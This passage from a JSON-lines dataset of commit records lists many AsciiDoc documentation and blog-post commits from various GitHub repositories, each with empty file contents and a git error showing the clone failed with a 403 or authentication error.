styling\n","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"html.adoc","new_file":"html.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"335fa6ad833462b4c9eccd67c8a3b22608024c0f","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df0a91f7276680406b904bb5011219378d11a0fe","subject":"Update 2017-02-25-blog-tiwqeqweqeqwqeqq.adoc","message":"Update 2017-02-25-blog-tiwqeqweqeqwqeqq.adoc","repos":"neurodiversitas\/neurodiversitas.github.io,neurodiversitas\/neurodiversitas.github.io,neurodiversitas\/neurodiversitas.github.io,neurodiversitas\/neurodiversitas.github.io","old_file":"_posts\/2017-02-25-blog-tiwqeqweqeqwqeqq.adoc","new_file":"_posts\/2017-02-25-blog-tiwqeqweqeqwqeqq.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neurodiversitas\/neurodiversitas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5fa9abbfd11dadd262e3b3bdb352530ddccb62a3","subject":"Update 2017-04-10-3-D-printer-is-coming.adoc","message":"Update 2017-04-10-3-D-printer-is-coming.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12453895190d3581380fbee2fe39453b56b64c50","subject":"Added README.adoc symlink for Github.","message":"Added README.adoc symlink for Github.\n","repos":"Yubico\/u2fval-client-php","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/u2fval-client-php.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"421f7ecd4def40f0eb90b9916f8c0f63eadaa7c7","subject":"Fix typo in ASAN cmake command","message":"Fix typo in ASAN cmake command\n\nChange-Id: I049679199d9fd3398a857f89a0e919e7bac1c628\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/12098\nTested-by: Will Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\nReviewed-by: Andrew Wong <b68e4fdc6430321a6b47400732ff97d7ae91234e@cloudera.com>\n","repos":"InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8d34e186109a4bf7803a0e63ac509bb21ea8c1e9","subject":"Readme.adoc","message":"Readme.adoc\n","repos":"trisberg\/jdbc,spring-cloud-stream-app-starters\/jdbc,trisberg\/jdbc","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/trisberg\/jdbc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a9f65fda24773a4a82dbe23f482e4e1f3ddd7965","subject":"Add README.adoc","message":"Add README.adoc\n","repos":"DaveDavenport\/MultiMonitorBackground","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DaveDavenport\/MultiMonitorBackground.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"719733e28c6f522eb95f0b782a5dc5441cba1fe8","subject":"Updated docs","message":"Updated docs\n","repos":"spring-cloud\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,marcingrzejszczak\/jenkins-pipeline,wybczu\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,marcingrzejszczak\/jenkins-pipeline,k0chan\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wybczu\/spring-cloud-pipelines.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c01a76e479720f94537237cd92ab04e38c30c5bd","subject":"Add README file","message":"Add README file\n","repos":"rgielen\/action-framework-comparison,rgielen\/action-framework-comparison,ivargrimstad\/action-framework-comparison,ivargrimstad\/action-framework-comparison","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rgielen\/action-framework-comparison.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66815be1c796d8a9e677df49e92f605a636e39ec","subject":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","message":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"915a6ffb06922b9fbdbc2a3b3b33ad4f2b84171e","subject":"Add main doc","message":"Add main doc\n","repos":"cunningt\/camel,tdiesler\/camel,pax95\/camel,cunningt\/camel,christophd\/camel,gnodet\/camel,mcollovati\/camel,pmoerenhout\/camel,mcollovati\/camel,pmoerenhout\/camel,christophd\/camel,pax95\/camel,adessaigne\/camel,tdiesler\/camel,nikhilvibhav\/camel,alvinkwekel\/camel,cunningt\/camel,tadayosi\/camel,adessaigne\/camel,pax95\/camel,mcollovati\/camel,tadayosi\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,alvinkwekel\/camel,nicolaferraro\/camel,christophd\/camel,gnodet\/camel,tadayosi\/camel,nikhilvibhav\/camel,christophd\/camel,adessaigne\/camel,tadayosi\/camel,pmoerenhout\/camel,apache\/camel,mcollovati\/camel,tdiesler\/camel,nicolaferraro\/camel,adessaigne\/camel,adessaigne\/camel,adessaigne\/camel,gnodet\/camel,cunningt\/camel,apache\/camel,apache\/camel,pax95\/camel,nicolaferraro\/camel,pmoerenhout\/camel,tdiesler\/camel,christophd\/camel,nicolaferraro\/camel,cunningt\/camel,apache\/camel,pax95\/camel,gnodet\/camel,christophd\/camel,nikhilvibhav\/camel,tadayosi\/camel,tdiesler\/camel,cunningt\/camel,apache\/camel,apache\/camel,pax95\/camel,alvinkwekel\/camel,gnodet\/camel,tadayosi\/camel,alvinkwekel\/camel,pmoerenhout\/camel,tdiesler\/camel","old_file":"core\/camel-main\/src\/main\/docs\/main.adoc","new_file":"core\/camel-main\/src\/main\/docs\/main.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0e8f713d94568dcd1cd6c8c5de888918377737ef","subject":"y2b create post 12-inch Retina MacBook Giveaway!","message":"y2b create post 12-inch Retina MacBook Giveaway!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-07-14-12inch-Retina-MacBook-Giveaway.adoc","new_file":"_posts\/2015-07-14-12inch-Retina-MacBook-Giveaway.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31288976eee9d1217e66d34829e4c519d4b0e37a","subject":"Update 2016-03-30-Las-matematicas-son-mis-amigas.adoc","message":"Update 2016-03-30-Las-matematicas-son-mis-amigas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Las-matematicas-son-mis-amigas.adoc","new_file":"_posts\/2016-03-30-Las-matematicas-son-mis-amigas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"remote: Support for password authentication was removed on August 13, 2021.\nremote: Please see https:\/\/docs.github.com\/en\/get-started\/getting-started-with-git\/about-remote-repositories#cloning-with-https-urls for information on currently recommended modes of authentication.\nfatal: Authentication failed for 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/'\n","license":"mit","lang":"AsciiDoc"} {"commit":"ddf81f8c8f103cd0fc23bd741cd1437eb9f9a9af","subject":"Update 2016-03-30-Las-matematicas-son-mis-amigas.adoc","message":"Update 2016-03-30-Las-matematicas-son-mis-amigas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Las-matematicas-son-mis-amigas.adoc","new_file":"_posts\/2016-03-30-Las-matematicas-son-mis-amigas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b4a76aeb118859d4bab91fa870a9d9bcad2f87d","subject":"Update 2016-05-06-Kinds-of-Static-analysis-tools.adoc","message":"Update 2016-05-06-Kinds-of-Static-analysis-tools.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-05-06-Kinds-of-Static-analysis-tools.adoc","new_file":"_posts\/2016-05-06-Kinds-of-Static-analysis-tools.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ab3ca04ad54f3f15a3d045ea9cc015dfccb5553","subject":"y2b create post The Ultimate Slim Wallet","message":"y2b create post The Ultimate Slim Wallet","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-05-12-The-Ultimate-Slim-Wallet.adoc","new_file":"_posts\/2016-05-12-The-Ultimate-Slim-Wallet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29e87d18b7fecb7afef6aef19ba86eeee16901bd","subject":"Update 2016-08-11-On-their-Way.adoc","message":"Update 2016-08-11-On-their-Way.adoc","repos":"NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io","old_file":"_posts\/2016-08-11-On-their-Way.adoc","new_file":"_posts\/2016-08-11-On-their-Way.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"246e16d6fce1a84d642d822fd13215c11ae2cb9b","subject":"Update 2018-03-14-test20180314.adoc","message":"Update 2018-03-14-test20180314.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-14-test20180314.adoc","new_file":"_posts\/2018-03-14-test20180314.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b27b2dfdc2172673a458ed6e9b4ca828a7bc9780","subject":"Amended JUnit 5 support module documentation with note about multi-browser usage of @ConfigurationValue","message":"Amended JUnit 5 support module documentation with note about multi-browser usage of @ConfigurationValue\n","repos":"slu-it\/webtester2-core,slu-it\/webtester2-core,testIT-WebTester\/webtester2-core,slu-it\/webtester2-core,testIT-WebTester\/webtester2-core,testIT-WebTester\/webtester2-core","old_file":"webtester-documentation\/src\/main\/asciidoc\/chapters\/support-module-junit5.asciidoc","new_file":"webtester-documentation\/src\/main\/asciidoc\/chapters\/support-module-junit5.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/slu-it\/webtester2-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"117c6b496a1ef5fff6f18a079b69b4b2eb4e9dac","subject":"new icons font strategy for next major release 4.0","message":"new icons font strategy for next major release 4.0\n","repos":"llaville\/asciidoc-bootstrap-backend,llaville\/asciidoc-bootstrap-backend","old_file":"docs\/iconsfont.asciidoc","new_file":"docs\/iconsfont.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/llaville\/asciidoc-bootstrap-backend.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4c22e9121b1ca148e334a7481093304139d0dfdf","subject":"A couple of 1.6 release notes","message":"A couple of 1.6 release notes\n\nChange-Id: Ia69cc1904b5e1a81fecf20a2ca5a8fb1908a6025\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/8702\nTested-by: Kudu Jenkins\nReviewed-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\n","repos":"EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aa9418585864588abc5cadcc753bbde0cb327798","subject":"Another pass on 0.10.0 release notes","message":"Another pass on 0.10.0 release notes\n\nChange-Id: I4414bdebb15d976c025dfce5a3f2bda5768bd5a9\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/3979\nTested-by: Kudu Jenkins\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\n","repos":"andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"df5c7a1ed49e6fb9f5f831f0c98c650aa2646475","subject":"Add more release notes for new features in 1.0","message":"Add more release notes for new features in 1.0\n\nChange-Id: Ideac208aa377b52cc9910c05a9fa4d25a333d49a\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/4370\nTested-by: Kudu Jenkins\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"73769de27155552fa0581e6cd141c268f62202d4","subject":"CAMEL-14065: Add tiny readme in components folder with linksto website like on root readme file.","message":"CAMEL-14065: Add tiny readme in components folder with linksto website like on root readme file.\n","repos":"DariusX\/camel,zregvart\/camel,pmoerenhout\/camel,pmoerenhout\/camel,tadayosi\/camel,nikhilvibhav\/camel,nicolaferraro\/camel,gnodet\/camel,DariusX\/camel,tdiesler\/camel,pax95\/camel,pax95\/camel,DariusX\/camel,pax95\/camel,gnodet\/camel,pax95\/camel,christophd\/camel,christophd\/camel,tdiesler\/camel,CodeSmell\/camel,cunningt\/camel,nicolaferraro\/camel,nikhilvibhav\/camel,tadayosi\/camel,tdiesler\/camel,adessaigne\/camel,apache\/camel,pmoerenhout\/camel,gnodet\/camel,cunningt\/camel,zregvart\/camel,apache\/camel,christophd\/camel,pax95\/camel,apache\/camel,ullgren\/camel,CodeSmell\/camel,tadayosi\/camel,mcollovati\/camel,objectiser\/camel,pmoerenhout\/camel,adessaigne\/camel,tadayosi\/camel,CodeSmell\/camel,ullgren\/camel,christophd\/camel,DariusX\/camel,nikhilvibhav\/camel,gnodet\/camel,mcollovati\/camel,CodeSmell\/camel,tadayosi\/camel,apache\/camel,cunningt\/camel,tdiesler\/camel,alvinkwekel\/camel,nikhilvibhav\/camel,zregvart\/camel,adessaigne\/camel,apache\/camel,gnodet\/camel,cunningt\/camel,pax95\/camel,mcollovati\/camel,objectiser\/camel,pmoerenhout\/camel,christophd\/camel,nicolaferraro\/camel,pmoerenhout\/camel,tdiesler\/camel,adessaigne\/camel,adessaigne\/camel,tadayosi\/camel,alvinkwekel\/camel,alvinkwekel\/camel,mcollovati\/camel,christophd\/camel,ullgren\/camel,tdiesler\/camel,adessaigne\/camel,objectiser\/camel,zregvart\/camel,alvinkwekel\/camel,objectiser\/camel,nicolaferraro\/camel,cunningt\/camel,apache\/camel,cunningt\/camel,ullgren\/camel","old_file":"components\/readme.adoc","new_file":"components\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ecd30af38a85c5e0c1e3fd395c895c814dbc8a0d","subject":"Comments","message":"Comments\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Best practices\/Style.adoc","new_file":"Best practices\/Style.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e18c0ccff7498dc053c154a051b3980b015005b7","subject":"docs: git: fix example","message":"docs: git: fix example\n\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"docs\/git-storage.adoc","new_file":"docs\/git-storage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8b727489eb787f9d0667192bb1160ed64e2aa70b","subject":"add document for KUDU-2080","message":"add document for KUDU-2080\n\nChange-Id: I7a802a846ad5ec93ce4e0022ec279f1b4c6cc5db\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/12774\nTested-by: Kudu Jenkins\nReviewed-by: Grant Henke <4cf7ebbe638391c4d27a10cf751b99bdbd1a1880@apache.org>\n","repos":"helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu","old_file":"docs\/known_issues.adoc","new_file":"docs\/known_issues.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6266fec0e7ff98106dec86d19af5bddbe10ed3d7","subject":"Initial revision of the IcmpMonitor monitor.","message":"Initial revision of the IcmpMonitor monitor.\n\nCyrille\n","repos":"aihua\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,aihua\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,tdefilip\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,aihua\/opennms,aihua\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,rdkgit\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,rdkgit\/opennms,tdefilip\/opennms,aihua\/opennms,tdefilip\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,aihua\/opennms,rdkgit\/opennms","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/IcmpMonitor.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/IcmpMonitor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tdefilip\/opennms.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"e69df991176845f454de62c8b0af31035bd12062","subject":"Update 2016-11-01-Mapping-in-JPA.adoc","message":"Update 2016-11-01-Mapping-in-JPA.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2016-11-01-Mapping-in-JPA.adoc","new_file":"_posts\/2016-11-01-Mapping-in-JPA.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5491e7eaeb3461a8fc273e6a09cf11735f0530c7","subject":"Update 2018-06-25-quick-rebel.adoc","message":"Update 2018-06-25-quick-rebel.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-06-25-quick-rebel.adoc","new_file":"_posts\/2018-06-25-quick-rebel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16472ed9381cb2d16df08dea48d38b85748945cc","subject":"Update 2018-10-12-Laravel-D-B.adoc","message":"Update 2018-10-12-Laravel-D-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-12-Laravel-D-B.adoc","new_file":"_posts\/2018-10-12-Laravel-D-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9487a2e72ddf8e38f9e4215e056f72aa477f0c75","subject":"Update 2015-07-15-Android-Intent-Image-Picker.adoc","message":"Update 2015-07-15-Android-Intent-Image-Picker.adoc","repos":"KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io","old_file":"_posts\/2015-07-15-Android-Intent-Image-Picker.adoc","new_file":"_posts\/2015-07-15-Android-Intent-Image-Picker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KozytyPress\/kozytypress.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"04a556204678df81ffa9cb26b05e168f923b1d99","subject":"Update 2016-06-07-Hello-Princess.adoc","message":"Update 2016-06-07-Hello-Princess.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-06-07-Hello-Princess.adoc","new_file":"_posts\/2016-06-07-Hello-Princess.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a97a279cd771727d96643bd68fbd946c4289dc7","subject":"Update 2017-02-08-fpv-drones-101.adoc","message":"Update 2017-02-08-fpv-drones-101.adoc","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/2017-02-08-fpv-drones-101.adoc","new_file":"_posts\/2017-02-08-fpv-drones-101.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63573fe5f779933d57bc68577e2c9f281351a799","subject":"Renamed '_posts\/2020-04-27-The-onboarding.adoc' to 